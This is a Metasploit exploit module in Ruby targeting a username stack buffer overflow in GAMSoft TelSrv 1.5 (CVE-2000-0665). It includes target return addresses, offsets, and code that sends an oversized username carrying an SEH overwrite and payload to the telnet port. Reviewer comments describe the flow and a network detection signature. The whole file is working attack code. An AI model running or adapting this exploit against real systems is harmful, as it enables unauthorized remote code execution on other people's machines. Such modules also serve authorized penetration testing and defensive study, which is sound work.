##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the GAMSoft TelSrv 1.5 username stack buffer overflow
  # (CVE-2000-0665, see 'References'). Delivery is a single oversized username
  # sent on the telnet port; the SEH overwrite is built by the Seh mixin from
  # the selected target's 'Ret'. Per the module description the service
  # terminates after exploitation, so a failed attempt cannot be retried
  # against the same process.
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers module metadata (name, references, payload constraints, targets)
  # and the single RPORT option (default 23, the telnet port).
  #
  # @param info [Hash] caller-supplied metadata, merged by update_info and
  #   passed to the superclass initializer
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
        'Description' => %q{
          This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.
          Other versions may also be affected. The service terminates after exploitation,
          so you only get one chance!
        },
        'Author' => [ 'aushack' ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2000-0665'],
          [ 'OSVDB', '373'],
          [ 'BID', '1478'],
          [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
        ],
        'Privileged' => false,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        # 'BadChars' is also what payload_badchars returns in #exploit, so the
        # filler text is generated without these two bytes as well.
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500,
        },
        'Platform' => ['win'],
        # All three enabled targets share the same 'Ret' and differ only in
        # 'Offset' (the position at which #exploit splices the SEH payload into
        # the username). The two LOCAL entries are labelled as debug targets.
        'Targets' => [
          [
            'Windows 2000 Pro SP0/4 English REMOTE',
            {
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
              'Offset' => 1886,
            }
          ],

          [
            'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
            {
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
              'Offset' => 3318,
            }
          ],

          [
            'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
            {
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
              'Offset' => 3358,
            }
          ],
          # The XP target below is disabled (=begin/=end); its own comment
          # states the offset was never determined.
=begin
          [ 'Windows XP Pro SP0/1 English',
            {
              'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL
              'Offset' => 2600, # this is made up and absolutely wrong ;-)
            }
          ],
=end
        ],
        'DisclosureDate' => '2000-07-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(23),
      ]
    )
  end

  # Banner-based version check.
  #
  # Connects, waits seven seconds (select with only a timeout acts as a
  # sleep), then reads whatever the service has sent so far, falling back to
  # an empty string if nothing arrived. A banner matching /TelSrv 1\.5/ yields
  # CheckCode::Appears -- the version string alone is the evidence, which is
  # why this is not a Vulnerable verdict. Any other banner yields
  # CheckCode::Safe.
  #
  # NOTE(review): no disconnect is issued on either path; presumably the
  # framework's cleanup closes the socket after check -- confirm.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    connect
    print_status("Attempting to determine if target is possibly vulnerable...")
    select(nil, nil, nil, 7)
    banner = sock.get_once || ''
    vprint_status("Banner: #{banner}")

    if banner.to_s =~ /TelSrv 1\.5/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Sends the overflow.
  #
  # Flow: connect, wait seven seconds (the inline comment explains why), build
  # a 20000-byte English-text username filtered against payload_badchars,
  # overwrite the bytes at target['Offset'] with the SEH record and payload
  # returned by generate_seh_payload(target.ret), send it, pause briefly,
  # start the handler and disconnect.
  #
  # Detection note: the observable signature on the wire is a ~20000-byte
  # username on the telnet port following a quiet seven-second interval.
  #
  # @return [void]
  def exploit
    print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
    connect
    print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
    select(nil, nil, nil, 7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.

    username = rand_text_english(20000, payload_badchars)
    seh = generate_seh_payload(target.ret)
    # In-place splice: seh.length bytes are replaced by seh.length bytes, so
    # the username stays exactly 20000 bytes long.
    username[target['Offset'], seh.length] = seh

    print_status("Sending #{username.length} byte username as exploit (including #{seh.length} byte payload)...")
    sock.put(username)
    select(nil, nil, nil, 0.25)
    print_status('Exploit sent...')
    handler
    disconnect
  end
end